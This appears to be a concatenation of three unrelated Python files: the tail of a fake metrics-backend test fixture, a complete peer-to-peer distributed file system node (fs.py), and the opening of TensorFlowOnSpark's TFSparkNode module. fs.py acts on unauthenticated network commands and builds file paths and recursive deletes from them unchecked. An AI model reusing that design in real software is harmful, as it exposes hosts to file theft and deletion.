        ingest_app.config.REQUEST_TIMEOUT = ingest_app.config.KEEP_ALIVE_TIMEOUT = 1000
        ingest_server = ingest_app.create_server(sock=ingest_sock, access_log=False)
        ingest_loop.create_task(ingest_server)
    ingest_loop.create_task(start_ingest_server())
    threading.Thread(target=ingest_loop.run_forever).start()
    api_loop = asyncio.new_event_loop()
    async def start_api_server():
        api_app.config.REQUEST_TIMEOUT = api_app.config.KEEP_ALIVE_TIMEOUT = 1000
        api_server = api_app.create_server(sock=api_sock, access_log=False)
        api_loop.create_task(api_server)
    api_loop.create_task(start_api_server())
    threading.Thread(target=api_loop.run_forever).start()
    def _add_datapoints():
        """
        This is an attempt at making the datapoint endpoint have more throughput for heavy load tests.
        """
        while True:
            dp_upload = _dp_upload_queue.get()
            if dp_upload is STOP:
                return
            _datapoints.extend(dp_upload.datapoints)  # pylint: disable=no-member
            for dp in dp_upload.datapoints:  # pylint: disable=no-member
                _datapoints_by_metric[dp.metric].append(dp)
                for dim in dp.dimensions:
                    _datapoints_by_dim[f"{dim.key}:{dim.value}"].append(dp)
    threading.Thread(target=_add_datapoints).start()
    class FakeBackend: # pylint: disable=too-few-public-methods
        # Handle yielded to the test; exposes collected data and endpoints.
        ingest_host = ip_addr
        ingest_port = _ingest_port
        ingest_url = f"http://{ingest_host}:{ingest_port}"
        api_host = ip_addr
        api_port = _api_port
        api_url = f"http://{api_host}:{api_port}"
        datapoints = _datapoints
        datapoints_by_metric = _datapoints_by_metric
        datapoints_by_dim = _datapoints_by_dim
        events = _events
        spans = _spans
        dims = _dims
        def dump_json(self):
            # Emit a summary (metric types, dimensions) to stdout as JSON.
            out = OrderedDict()
            dps = [dp[0] for dp in self.datapoints_by_metric.values()]
            metrics = {(dp.metric, dp.metricType) for dp in dps}
            out["metrics"] = {metric: {"type": get_metric_type(metric_type)} for metric, metric_type in sorted(metrics)}
            out["dimensions"] = sorted(set(self.datapoints_by_dim))
            out["common_dimensions"] = []
            # Set dimensions that are present on all datapoints.
            for dim, dps in self.datapoints_by_dim.items():
                if len({dp.metric for dp in dps}) == len(metrics):
                    out["common_dimensions"].append(dim)
            json.dump(out, sys.stdout, indent=2)
        def reset_datapoints(self):
            self.datapoints.clear()
            self.datapoints_by_metric.clear()
            self.datapoints_by_dim.clear()
    try:
        yield FakeBackend()
    finally:
        ingest_sock.close()
        api_sock.close()
        api_loop.stop()
        ingest_loop.stop()
        # STOP sentinel unblocks the _add_datapoints thread so it can exit.
        _dp_upload_queue.put(STOP)
|
fs.py | import os,socket,threading,sys,ast, queue, shutil, xattr, struct
from pathlib import Path
lock = threading.Lock()  # guards localfilelist / serverlist mutations across threads
Q = queue.Queue()  # hands fetched file contents from the network thread to the command thread
'''
To do:
3) Deleting Replicated Files
4) Connecting using hostname
5) Smart client and file transfer with data server direct
6) Making directory and file
7) Removing from list
'''
MAX_MSG = 1024  # max bytes per socket recv()
MAX_SERVS = 3
SERVER_PORT = 10000  # TCP port used for server-to-server links
CLIENT_PORT = 6969  # TCP port clients listen on
DFSOnline = 0  # number of peer servers currently connected
RootDir = 'root'  # local directory backing this server's share
#locname = str(socket.getfqdn())
locname = str(socket.gethostbyname(socket.gethostname()))  # this host's IP address
localfilelist = []  # [[name, version], ...] for entries stored locally
localreplicalist = []  # names of files held here only as replicas
serverlist={}  # addr -> serverContents for every known peer (and ourselves)
clientlist=[]  # connected client sockets
class bcolors:
    """ANSI escape sequences used to colour terminal output."""
    HEADER = '\033[95m'#PURPLE
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'#YELLOW
    FAIL = '\033[91m'#RED
    ENDC = '\033[0m'#WHITE  (resets colour)
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
class serverContents:
    """Per-peer connection state: socket, known file list, and a cost counter."""

    def __init__(self):
        # Socket and remote file list are unknown until the peer connects.
        self.fd, self.filelist = None, None
        # Large sentinel so an unpopulated peer never wins cost comparisons.
        self.count = 99999
def globalListGenerator(ign_addr):
    """Collect every file name known across all servers except *ign_addr*."""
    combined = []
    for server, contents in serverlist.items():
        if server == ign_addr:
            continue
        if contents.filelist is not None:
            combined.extend(entry[0] for entry in contents.filelist)
    return combined
def generateList():
    """Rebuild localfilelist/localreplicalist by walking RootDir.

    File versions are read from the 'user.comment' xattr; replicas are
    recognised by '%' in their on-disk name ('%' encodes '/').
    """
    del localfilelist[:]
    del localreplicalist[:]
    for root, dirs, files in os.walk(RootDir):
        #localfilelist.append(os.path.relpath(root,RootDir))
        prefx = os.path.relpath(root,RootDir)
        if (prefx != '.'):
            prefx = '/'+prefx
        else:
            prefx = ''
        for f in files:
            try:
                # Stored version number; defaults to 0 when the xattr is missing.
                att = (xattr.getxattr(RootDir+prefx+'/'+f,'user.comment')).decode()
            except OSError:
                att = 0
            if(f.count('%')>0):
                # Replica: '%' in the on-disk name encodes '/' of the DFS path.
                fname = prefx+f.replace('%','/')
                localfilelist.append([fname, str(att)])
                localreplicalist.append(fname)
            else:
                localfilelist.append([prefx+'/'+f, str(att)])
        for d in dirs:
            # Directories get a trailing '/' and version -1.
            localfilelist.append([prefx+'/'+d+'/',str(-1)])
    # Publish our own list under this host's serverlist entry.
    serverlist[locname].filelist = localfilelist
    for files in localfilelist:
        print(files)
def fileExists(name):
    """Return True if *name* exists anywhere in the DFS (any server)."""
    target = name if name.startswith('/') else '/' + name
    return target in globalListGenerator(-1)
def fileExistsLoc(name):
    """Return True if *name* is present in this server's local file list."""
    target = name if name.startswith('/') else '/' + name
    return any(entry[0] == target for entry in localfilelist)
def repExistsLoc(name):
    """Return True if *name* is stored here only as a replica."""
    target = name if name.startswith('/') else '/' + name
    return target in localreplicalist
def locFileLocator(name):
    """Return the index of *name* in localfilelist, or None if absent."""
    target = name if name.startswith('/') else '/' + name
    for idx, entry in enumerate(localfilelist):
        if entry[0] == target:
            return idx
    return None
def custFileLocator(serv, name):
    """Return the index of *name* in server *serv*'s file list, or None."""
    target = name if name.startswith('/') else '/' + name
    for idx, entry in enumerate(serverlist[serv].filelist):
        if entry[0] == target:
            return idx
    return None
def fileLocator(name, ign_addr):
    """Return the address of the first server (excluding *ign_addr*) whose
    file list contains *name*, or -1 when no server has it."""
    target = name if name.startswith('/') else '/' + name
    for server, contents in serverlist.items():
        if server == ign_addr or contents.filelist is None:
            continue
        for entry in contents.filelist:
            if entry[0] == target:
                return server
    return -1
def broadcast(msg):
    """Send *msg* (bytes) to every connected peer server except ourselves.

    A failed send on one peer is skipped so that a single dead connection
    cannot block updates to the remaining servers.
    """
    for server in serverlist:
        if serverlist[server].fd is not None and server != locname:
            try:
                serverlist[server].fd.sendall(msg)
            # Bug fix: was a bare `except:`, which also swallowed
            # KeyboardInterrupt/SystemExit; socket failures are OSError.
            except OSError:
                continue
def costCreationFunc(cost, ign_addr):
    """Pick the connected server with the fewest files (below *cost*).

    Args:
        cost: initial threshold; only servers with fewer entries win.
        ign_addr: server address to skip (0 means "skip nobody").

    Returns:
        The chosen server address, falling back to the local server.
    """
    # Bug fix: `serv` was only initialised when ign_addr == 0, so calls with a
    # non-zero ign_addr could hit UnboundLocalError when no peer beat *cost*.
    serv = locname
    for server in serverlist:
        if ign_addr == server:
            continue
        # Only consider live peers with a known file list.
        if serverlist[server].fd is not None and serverlist[server].filelist is not None:
            if len(serverlist[server].filelist) < cost:
                cost = len(serverlist[server].filelist)
                serv = server
    return serv
def syncFiles(serverid):
    """Push newer local versions of shared files to peer *serverid*.

    For every file both sides know about, if our version number is higher we
    send a 'fil_up' message containing the new version and contents, and bump
    the version recorded in the peer's file list.
    """
    for remote in serverlist[serverid].filelist:
        for local in localfilelist:
            if remote[0] == local[0]:
                if int(remote[1]) < int(local[1]):
                    if(repExistsLoc(local[0])):
                        # Replicas are stored on disk with '/' encoded as '%'.
                        local[0] = local[0].replace('/','%')
                    name = RootDir+'/'+local[0]
                    serverlist[serverid].fd.sendall(('fil_up'+remote[0]+';'+local[1]+';'+Path(name).read_text() +'Āā').encode())
                    # Bug fix: was `serverlist[serverid].filelist[1] = ...`,
                    # which overwrote the list's second ENTRY instead of this
                    # file's version number.
                    remote[1] = local[1]
                break
def cmdParse(cmd):
    """Dispatch a user/peer command string and return a reply message.

    Commands: peek/dir, read, writ, updt, make, remv, rmdr, apen, open,
    cons, exis, help.  Returns '\n' + a human-readable status (or a
    'con<addr>' redirect telling the caller to contact another server).
    """
    #filelist = os.listdir("root")
    ret_msg = ''
    if cmd == 'peek'or cmd == 'dir':
        # Render the global file tree with box-drawing characters.
        T = globalListGenerator(-1)
        #T.extend(globalReplicGenerator())
        T = set(T)
        ret_msg = '-'*10 +'File Directory' + '-'*10 +'\n'
        ret_msg +=RootDir+'/\n'
        filelists = sorted(T)
        for ind, files in enumerate(filelists):
            # Nesting level = number of '/' separators (ignoring a trailing one).
            lvl = files[:-1].count('/')
            name = files[:-1].rfind('/')
            prev_lvl =filelists[ind-1][:-1].count('/')
            ret_msg += ' '*lvl
            if(ind == len(filelists)-1):
                ret_msg += '└'+files[name:]+'\n'
                continue
            else:
                nxt_lvl = filelists[ind+1][:-1].count('/')
                if(lvl>prev_lvl and nxt_lvl == lvl):
                    ret_msg += '┌'
                elif( lvl == nxt_lvl):
                    ret_msg += '├'
                else:
                    ret_msg += '└'
                ret_msg += files[name:]+'\n'
    elif cmd[:5] == 'read ':
        # Return a local file's text, or redirect the caller to the owner.
        path = cmd[5:]
        exe_str = cmd[-(len(path)-(path.rfind('.'))):]
        extensions = ['.txt','.c','.py']
        if not(any(x in exe_str for x in extensions)):
            ret_msg ='File not readable'
        elif not(fileExists(path)):
            ret_msg ='File Does Not Exists'
        elif (fileExistsLoc(path)):
            if(repExistsLoc(path)):
                # Replicas live on disk with '/' encoded as '%'.
                path =path.replace('/','%')
                if('%' not in path[:1]):
                    path='%'+path
            try:
                ret_msg =('_'*40+'\n' +Path(RootDir+"/"+path).read_text()+'_'*40)
            except Exception as e:
                ret_msg = str(e)
        else:
            servid = fileLocator(path, -1)
            #serverlist[port].fd.sendall(('give'+path).encode())
            #ret_msg ='_'*40+'\n' + Q.get()+'\n'+'_'*40
            # NOTE(review): servid can be -1 (int) here, which would make
            # 'con'+servid raise TypeError — confirm unreachable.
            ret_msg = 'con'+servid
            #serverlist[servid].fd.sendall('con'#getpeername()[0]
    elif cmd[:5] == 'writ ':
        # Open-for-write: reply with 'wr<name>;<contents>' or redirect.
        fil_path = cmd[5:]
        tpath = '%' + fil_path.replace('/','%')
        exe_str = cmd[-(len(fil_path)-(fil_path.rfind('.'))):]
        extensions = ['.txt','.c','.py']
        ret_msg = 'wr'+tpath+';'
        if not(any(x in exe_str for x in extensions)):
            ret_msg ='File Cannot Be Opened'
        elif not(fileExists(fil_path)):
            ret_msg ='File Does Not Exists'
        elif (fileExistsLoc(fil_path)):
            if(repExistsLoc(fil_path)):
                fil_path =fil_path.replace('/','%')
                if('%' not in fil_path[:1]):
                    fil_path='%'+fil_path
            try:
                # 'Āā' is the end-of-payload marker used on the wire.
                ret_msg+= (Path(RootDir+"/"+fil_path).read_text() +'Āā')
            except Exception as e:
                ret_msg = str(e)
        else:
            servid = fileLocator(fil_path, -1)
            #serverlist[port].fd.sendall(('give'+fil_path).encode())
            #ret_msg+= (Q.get()+'Āā')
            ret_msg = 'con'+servid
            #serverlist[servid].fd.sendall('con'#getpeername()[0]
    elif cmd[:5] == 'updt ':
        # Write new contents ('updt <name>;<data>'), bump the version xattr
        # and propagate the update to a peer holding a stale copy.
        fil_path = cmd[5:cmd.find(';')].replace('%','/')
        fil_path = fil_path[1:]
        if (not fileExists(fil_path)):
            ret_msg='File Does not Exists'
        elif (fileExistsLoc(fil_path)):
            name = RootDir+'/'+fil_path
            if(repExistsLoc(fil_path)):
                fil_path =fil_path.replace('/','%')
                if('%' not in fil_path[:1]):
                    name = RootDir+'/%'+fil_path
            try:
                with open(name,'w') as f:
                    f.write(cmd[cmd.find(';')+1:])
                ret_msg = 'Written To File'
                att =int( localfilelist[locFileLocator(fil_path)][1])+1
                localfilelist[locFileLocator(fil_path)][1] = str(att)
                xattr.setxattr(name, 'user.comment', str(att))
                #broadcast(('ver_up'+str(att)+';/'+fil_path+'Ĕ').encode())
                serv = fileLocator(fil_path, SERVER_PORT)
                if(serv!=-1):
                    if(int(serverlist[serv].filelist[custFileLocator(serv, fil_path)][1]) < att):
                        serverlist[serv].fd.sendall(('ver_up'+str(att)+';/'+fil_path+'Ĕ'+cmd+'Āā'+'Ĕ').encode())
            except Exception as e:
                ret_msg = str(e)
        else:
            # Not stored here: forward the whole command to the owner.
            serverlist[fileLocator(fil_path,-1)].fd.sendall((cmd+'Āā').encode())
            ret_msg = 'Written To File'
    elif cmd[:5] == 'make ':
        # Create a file/directory on the cheapest server, then replicate.
        if (fileExists(cmd[5:])):
            ret_msg='File Already Exists'
        else:
            cost = len(localfilelist)
            serv = SERVER_PORT
            if(cmd.rfind('/')!=-1):
                # Parent directory location pins where the file is created.
                if (fileExistsLoc(cmd[5:cmd.rfind('/')])):
                    cost=0
                elif fileExists(cmd[5:cmd.rfind('/')]):
                    cost=0
                    serv = fileLocator(cmd[5:cmd.rfind('/')],-1)
            if cost !=0:
                serv = costCreationFunc(cost,0)
            if(serv==SERVER_PORT):
                # Create locally.
                flag = True
                ret_msg ='File Created'
                try:
                    file1 = open(RootDir+"/"+cmd[5:],'w+')
                    file1.close()
                except IsADirectoryError:
                    os.makedirs(RootDir+"/"+cmd[5:cmd.rfind('/')])
                    flag = False
                    ret_msg = 'Directory Created'
                except FileNotFoundError:
                    # Missing parent: create it, then the file.
                    os.makedirs(RootDir+"/"+cmd[5:cmd.rfind('/')])
                    file1 = open(RootDir+"/"+cmd[5:],'w+')
                    file1.close()
                broadcast(('dir_ap'+"/"+cmd[5:]+'Ĕ').encode())
                if(flag):
                    lock.acquire()
                    localfilelist.append(["/"+cmd[5:],str(0)])
                    lock.release()
                    xattr.setxattr(RootDir+"/"+cmd[5:],"user.comment", str(0))
                    if(DFSOnline!=0):
                        # Ask the cheapest peer to hold a replica.
                        replic_serv = costCreationFunc(9999,SERVER_PORT)
                        serverlist[replic_serv].fd.sendall(('rep%'+cmd[5:].replace('/','%')).encode())
                else:
                    lock.acquire()
                    localfilelist.append(["/"+cmd[5:],str(-1)])
                    lock.release()
            else:
                # Delegate creation to the chosen peer.
                serverlist[serv].fd.sendall((cmd).encode())
                ret_msg ='File Created'
    elif cmd[:5] == 'remv ':
        # Remove a file (or empty directory); forwards to the owner if remote.
        fil_path = cmd[5:]
        if not(fileExists(fil_path)):
            ret_msg ='File Does Not Exists'
        else:
            ret_msg ='File Deleted'
            if (fileExistsLoc(fil_path)):
                name = fil_path
                if(repExistsLoc(fil_path)):
                    fil_path ='%'+fil_path.replace('/','%')
                if('/' not in fil_path):
                    fil_path = '/'+fil_path
                if(cmd[-1:]!='/'):
                    os.remove(RootDir+fil_path)
                else:
                    try:
                        os.rmdir(RootDir+"/"+cmd[5:-1])
                        ret_msg = "Directory Deleted"
                    except OSError:
                        ret_msg = "To Delete Non-empty Directories, use rmdr"
                lock.acquire()
                del localfilelist[locFileLocator(name)]
                lock.release()
                broadcast(('dir_dl'+name+'Ĕ').encode())
                # Also tell any replica holder to delete its copy.
                serv = fileLocator(name, SERVER_PORT)
                if(serv!=-1):
                    serverlist[serv].fd.sendall((cmd+'Ĕ').encode())
            else:
                serverlist[fileLocator(fil_path, -1)].fd.sendall((cmd).encode())
    elif cmd[:5] == 'rmdr ':
        # Recursively delete a directory.
        if not(fileExists(cmd[5:])):
            ret_msg ='Directory Does Not Exists'
        else:
            ret_msg ='Directory Deleted'
            if (fileExistsLoc(cmd[5:])):
                shutil.rmtree((RootDir+"/"+cmd[5:]))
                lock.acquire()
                generateList()
                lock.release()
                broadcast(('dir_up'+repr(localfilelist)).encode())
            else:
                serverlist[fileLocator(cmd[5:], -1)].fd.sendall((cmd).encode())
    elif cmd[:5] == 'apen ':
        # Append text: 'apen <file> <text>'.
        text = cmd.split(' ',2)
        exe_str = cmd[(text[1]).rfind('.'):]
        extensions = ['.txt','.c','.py']
        if not(any(x in exe_str for x in extensions)):
            ret_msg ='File not readable'
        elif not(fileExists(text[1])):
            ret_msg ='File Does Not Exists'
        elif (fileExistsLoc(text[1])):
            try:
                with open("root/"+text[1], 'a+') as f:
                    f.write(text[2]+'\n')
                ret_msg = 'appended to file'
            except Exception as e:
                ret_msg = str(e)
        else:
            serv = fileLocator(text[1], -1)
            serverlist[serv].fd.sendall((cmd).encode())
            ret_msg = 'appended to file'
    elif cmd[:5] == "open ":
        # Open a file in gedit; fetches remote contents first if needed.
        path = cmd[5:]
        exe_str = cmd[-(len(path)-(path.rfind('.'))):]
        extensions = ['.txt','.c','.py']
        if not(any(x in exe_str for x in extensions)):
            ret_msg ='File Cannot Be Opened'
        elif not(fileExists(path)):
            ret_msg ='File Does Not Exists'
        elif (fileExistsLoc(path)):
            # Child process execs the editor; parent keeps serving.
            if(os.fork()==0):
                ret_msg = 'File Opened'
                os.execvp('gedit',['gedit', './'+RootDir+'/'+path])
        else:
            serv = fileLocator(path, -1)
            serverlist[serv].fd.sendall(('give'+path).encode())
            ret_msg = 'File Opened'
            if path.rfind('/') !=-1:
                tpath = '%'+path.replace('/', '%')#path[path.rfind('/')+1:]
            else:
                tpath = '%'+path
            # Q.get() blocks until recServMsg delivers the file contents.
            with open(tpath, 'x') as f:
                f.write(Q.get())
            ret_msg = 'File Opened'
            if(os.fork()==0):
                os.execvp('gedit',['gedit', tpath])
    elif cmd == 'cons':
        # List live peer connections.
        ret_msg ='_'*40
        for servers in serverlist:
            if serverlist[servers].fd!=None:
                ret_msg +='\n'+repr(serverlist[servers].fd) + ' ' +str(servers)
        ret_msg +='_'*40
    elif cmd[:5] == 'exis ':
        if (fileExists(cmd[5:])):
            ret_msg = 'File Present'
        else:
            ret_msg = 'File Absent'
    #elif cmd == 'repl':
    #    for serports in serverlist:
    #        ret_msg += repr(serverlist[serports].replicalist)
    elif ('help'in cmd or 'cmd' in cmd):
        ret_msg ='_'*30 + "\nList Of Possible Commands:\n" + '-'*30+"\npeek View File Directory ..\ncons View Connections ..\nmake [file] ..\nremv [file] ..\nexis [file] ..\nread [file] ..\nwrit [file] ..\nupdt [file] ..\nexit Close Program ..\n"+'-'*30 #\napen [file] [text] ..
    else:
        ret_msg ='Invalid Command. Use help.'
    return ('\n' + ret_msg)
def recServMsg(fd):
    """Receive loop for a peer-server socket *fd*.

    Messages are 'Ĕ'-separated; long payloads end with the 'Āā' marker and
    are drained with extra recv() calls.  An empty read means the peer
    closed the connection.
    """
    while(True):
        data = fd.recv(MAX_MSG).decode()
        # Reverse-lookup which peer this socket belongs to.
        serv = 0
        for server in serverlist:
            if serverlist[server].fd == fd:
                serv = server
                break
        if len(data) >0:
            print('\nMsg Recieved from Server: ', serv,' : ',data, '\n<cmd>: ', end='',flush=True)
            all_data = data.split('Ĕ')
            for data in all_data:
                if(len(data)<1):
                    continue
                if data[:6] == 'dir_up':
                    # Peer sent its full file list (repr of a Python list).
                    serverlist[serv].filelist = ast.literal_eval(data[6:])
                elif data[:6] == 'dir_ap':
                    # Peer created a file; append it with version 0.
                    serverlist[serv].filelist.append([data[6:], str(0)])
                elif data[:6] == 'dir_dl':
                    # Peer deleted a file; drop it from their list.
                    for files in serverlist[serv].filelist:
                        if data[6:] == files[0]:
                            serverlist[serv].filelist.remove(files)
                            break
                elif data[:6] == 'ver_up':
                    # Peer bumped a file's version: 'ver_up<ver>;<name>'.
                    data = data.split(';')
                    serverlist[serv].filelist[custFileLocator(serv, data[1])][1] = data[0][6:]
                elif data[:4] == 'rep%':
                    # Peer asked us to hold a replica ('%' encodes '/').
                    file1 = open(RootDir+"/"+data[3:],'w+')
                    file1.close()
                    fname = data[3:].replace('%','/')
                    xattr.setxattr(RootDir+"/"+data[3:],"user.comment", str(0))
                    lock.acquire()
                    localfilelist.append([fname, str(0)])
                    localreplicalist.append(fname)
                    lock.release()
                    broadcast(('dir_ap'+fname).encode())
                elif data[:4] == 'give':
                    # Peer wants a file's contents.
                    try:
                        file_content = Path("root/"+data[4:]).read_text()
                        fd.sendall(('fil_msg'+';'+file_content+'Āā').encode())
                    except Exception as e:
                        fd.sendall(e.args[1].encode())
                elif(data[:5] == 'updt '):
                    # Forwarded update command; drain until the end marker.
                    while(data[-2:]!='Āā'):
                        data +=fd.recv(MAX_MSG).decode()
                    reply = cmdParse(data[:-2])
                    fd.sendall(reply.encode())
                elif(data[:6] == 'fil_up'):
                    # Newer file contents pushed by a peer: 'fil_up<name>;<ver>;<data>'.
                    file_data = data.split(';')
                    while(file_data[2][-2:]!='Āā'):
                        file_data[2] += fd.recv(MAX_MSG).decode()
                    fil_path = file_data[0][6:]
                    name = RootDir+"/"+fil_path
                    if(repExistsLoc(fil_path)):
                        name = RootDir+ '/'+fil_path.replace('/','%')
                    with open(name,'w') as f:
                        f.write(file_data[2][:-2])
                    localfilelist[locFileLocator(fil_path)][1] = file_data[1]
                    xattr.setxattr(name, 'user.comment', file_data[1])
                elif data[:7] == 'fil_msg':
                    # File contents we requested; hand them to the waiting thread.
                    file_data = data.split(';')
                    while(file_data[1][-2:]!='Āā'):
                        file_data[1] += fd.recv(MAX_MSG).decode()
                    Q.put(file_data[1][:-2])
                    #print(result + '\n<cmd>: ', end='',flush=True)
                elif data[:3] == 'con':
                    # Peer redirected a client to us; dial the client directly.
                    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    client.connect((data[3:], CLIENT_PORT))
                    clientlist.append(client)
                    #print(clientlist)
                    print('\nIncoming Client Connection:', data[3:],'\n<cmd>: ', end='',flush=True)
                    threading.Thread(target=recCliMsg, kwargs={'fd':client}).start()
                elif data[:4] == 'apen':
                    cmdParse(data)
                elif data[:5] == 'remv ':
                    print(cmdParse(data))
                elif data[:5] == 'make ':
                    print(cmdParse(data))
        else:
            # Empty read: peer disconnected; clean up its state.
            print('\nTerminating Connection:', serv,fd.getpeername(),'\n<cmd>: ', end='',flush=True)
            fd.close()
            serverlist[serv].fd = None
            serverlist[serv].filelist = None
            global DFSOnline
            DFSOnline-=1
            break
def recCliMsg(fd):
    """Receive loop for a client socket *fd*: parse commands and reply.

    'con…' replies redirect the client to the server that owns the file.
    An empty read means the client disconnected.
    """
    while(True):
        data = (fd.recv(MAX_MSG)).decode()
        if len(data) >0:
            print('\nMsg Recieved from Client: ', repr(fd.getpeername()),' : ',data, '\n<cmd>: ', end='',flush=True)
            if(data[:5] == 'updt '):
                # Updates carry a payload; drain until the 'Āā' end marker.
                while(data[-2:]!='Āā'):
                    data +=fd.recv(MAX_MSG).decode()
                data = data[:-2]
            reply = cmdParse(data)
            if(reply[1:4] == 'con'):
                # Redirect: send '\ncon' to the client and tell the owning
                # server (reply[4:]) to dial the client back.
                fd.sendall(reply[:4].encode())
                serverlist[reply[4:]].fd.sendall(('con'+fd.getpeername()[0]).encode())
            else:
                fd.sendall(reply.encode())
        else:
            print('\nTerminating Connection with Client:', fd.getpeername(),'\n<cmd>: ', end='',flush=True)
            clientlist.remove(fd)
            fd.close()
            break
def multiCast():#listening on multicast group
    """Listen on UDP multicast 224.4.255.255:50000 for join announcements.

    'cli' datagrams announce a new client; 'ser' datagrams announce a new
    server.  Either way we dial the sender back over TCP and spawn the
    matching receive-loop thread.
    """
    global DFSOnline
    server_address = ('', 50000)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(server_address)
    group = socket.inet_aton('224.4.255.255')
    mreq = struct.pack('4sL', group, socket.INADDR_ANY)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    print('\nwaiting to receive multicast message')
    while True:
        data, address = sock.recvfrom(4)
        if(data.decode() == 'cli'):
            cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                cli.connect((address[0], CLIENT_PORT))
            except:
                # Client vanished before we could connect; ignore it.
                continue
            else:
                clientlist.append(cli)
                #print(clientlist)
                print('\nIncoming Client Connection:', address,'\n<cmd>: ', end='',flush=True)
                threading.Thread(target=recCliMsg, kwargs={'fd':cli}).start()
        elif(data.decode() == 'ser'):
            # New server: exchange file lists, then sync and start receiving.
            serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            serv.connect((address[0],SERVER_PORT))
            data = serv.recv(MAX_MSG).decode()
            serverlist[address[0]] = serverContents()
            while(data[-2:]!='Āā'):
                data +=serv.recv(MAX_MSG).decode()
            serverlist[address[0]].fd= serv
            serv.sendall((repr(localfilelist)+'Āā').encode())#+';'+repr(localreplicalist)
            lock.acquire()
            DFSOnline+=1
            serverlist[address[0]].filelist = ast.literal_eval(data[:-2])
            syncFiles(address[0])
            lock.release()
            print('\nIncoming Server Connection:', address,'\n<cmd>: ', end='',flush=True)
            threading.Thread(target=recServMsg, kwargs={'fd':serv}).start()
def sockListen(sockfd):
    """Accept loop for incoming peer-server TCP connections on *sockfd*.

    On each accept: register the peer, exchange file lists (our list first),
    sync newer local files over, and start a receive thread.
    """
    global DFSOnline
    sockfd.listen()
    while(True):
        conn, addr = sockfd.accept()
        serverlist[addr[0]] = serverContents()
        serverlist[addr[0]].fd = conn
        print('Connected to Server: ', addr)
        conn.sendall((repr(localfilelist)+'Āā').encode())
        data = conn.recv(MAX_MSG).decode()
        # Drain until the 'Āā' end-of-payload marker.
        while(data[-2:]!='Āā'):
            data +=conn.recv(MAX_MSG).decode()
        lock.acquire()
        DFSOnline+=1
        serverlist[addr[0]].filelist = ast.literal_eval(data[:-2])
        syncFiles(addr[0])
        lock.release()
        t = threading.Thread(target=recServMsg, kwargs={'fd':conn})
        #t.daemon = True
        t.start()
def main():
    """Start the DFS node: TCP listener, multicast announce/listen, and the
    interactive command prompt."""
    print(locname)
    serverlist[locname]=serverContents()
    serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    serv.bind(('', SERVER_PORT))
    generateList()
    serverlist[locname].fd=serv
    # Background thread accepts peer-server connections.
    t = threading.Thread(target=sockListen, kwargs={"sockfd": serv})
    t.daemon = True
    t.start()
    #-----------------------------------------------------------
    # Announce ourselves to the multicast group so existing peers dial in.
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(0.5)
    ttl = struct.pack('b', 1)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, ttl)
    sent = sock.sendto(b'ser', ('224.4.255.255', 50000))
    #----------------------------------------------------------
    # Background thread listens for future client/server announcements.
    mtc = threading.Thread(target = multiCast)
    mtc.daemon = True
    mtc.start()
    # Interactive REPL on the main thread.
    while(True):
        cmd=input('<cmd>: ')
        if(cmd=='close' or cmd == 'exit'):
            sys.exit()
        print(cmdParse(cmd))
# Run only when executed directly (not when imported).
if __name__ == "__main__":
    main()
|
TFSparkNode.py | # Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""This module provides low-level functions for managing the TensorFlowOnSpark cluster."""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import json
import logging
import multiprocessing
import os
import platform
import socket
import subprocess
import sys
import uuid
import time
import traceback
from threading import Thread
from . import TFManager
from . import TFNode
from . import gpu_info
from . import marker
from . import reservation
from . import util
class TFNodeContext:
    """Per-executor metadata for a TensorFlowOnSpark node.

    An instance of this class is passed to the user's TensorFlow "main"
    function as the ``ctx`` argument.  To simplify the end-user API, it also
    mirrors the functions of the TFNode module as convenience methods.

    Args:
      :executor_id: integer identifier for this executor, per ``nodeRDD = sc.parallelize(range(num_executors), num_executors).``
      :job_name: TensorFlow job name (e.g. 'ps' or 'worker') of this TF node, per cluster_spec.
      :task_index: integer rank per job_name, e.g. "worker:0", "worker:1", "ps:0".
      :cluster_spec: dictionary for constructing a tf.train.ClusterSpec.
      :defaultFS: string representation of default FileSystem, e.g. ``file://`` or ``hdfs://<namenode>:8020/``.
      :working_dir: the current working directory for local filesystems, or YARN containers.
      :mgr: TFManager instance for this Python worker.
    """
    def __init__(self, executor_id, job_name, task_index, cluster_spec, defaultFS, working_dir, mgr):
        # ``worker_num`` is kept as an alias of executor_id for backwards-compatibility.
        self.worker_num = executor_id
        self.executor_id = executor_id
        self.job_name = job_name
        self.task_index = task_index
        self.cluster_spec = cluster_spec
        self.defaultFS = defaultFS
        self.working_dir = working_dir
        self.mgr = mgr

    def absolute_path(self, path):
        """Delegates to ``TFNode.hdfs_path`` using this node's filesystem context."""
        return TFNode.hdfs_path(self, path)

    def start_cluster_server(self, num_gpus=1, rdma=False):
        """Delegates to ``TFNode.start_cluster_server`` for this node."""
        return TFNode.start_cluster_server(self, num_gpus, rdma)

    def export_saved_model(self, sess, export_dir, tag_set, signatures):
        """Delegates to ``TFNode.export_saved_model``."""
        TFNode.export_saved_model(sess, export_dir, tag_set, signatures)

    def get_data_feed(self, train_mode=True, qname_in='input', qname_out='output', input_mapping=None):
        """Delegates to ``TFNode.DataFeed`` bound to this node's TFManager."""
        return TFNode.DataFeed(self.mgr, train_mode, qname_in, qname_out, input_mapping)
class TFSparkNode(object):
    """Low-level functions used by the high-level TFCluster APIs to manage cluster state.

    **This class is not intended for end-users (see TFNode for end-user APIs)**.

    For cluster management, this wraps the per-node cluster logic as Spark RDD mapPartitions functions, where the RDD is expected to be
    a "nodeRDD" of the form: ``nodeRDD = sc.parallelize(range(num_executors), num_executors)``.

    For data feeding, this wraps the feeding logic as Spark RDD mapPartitions functions on a standard "dataRDD".

    This also manages a reference to the TFManager "singleton" per executor.  Since Spark can spawn more than one python-worker
    per executor, this will reconnect to the "singleton" instance as needed.
    """
    mgr = None                #: TFManager instance
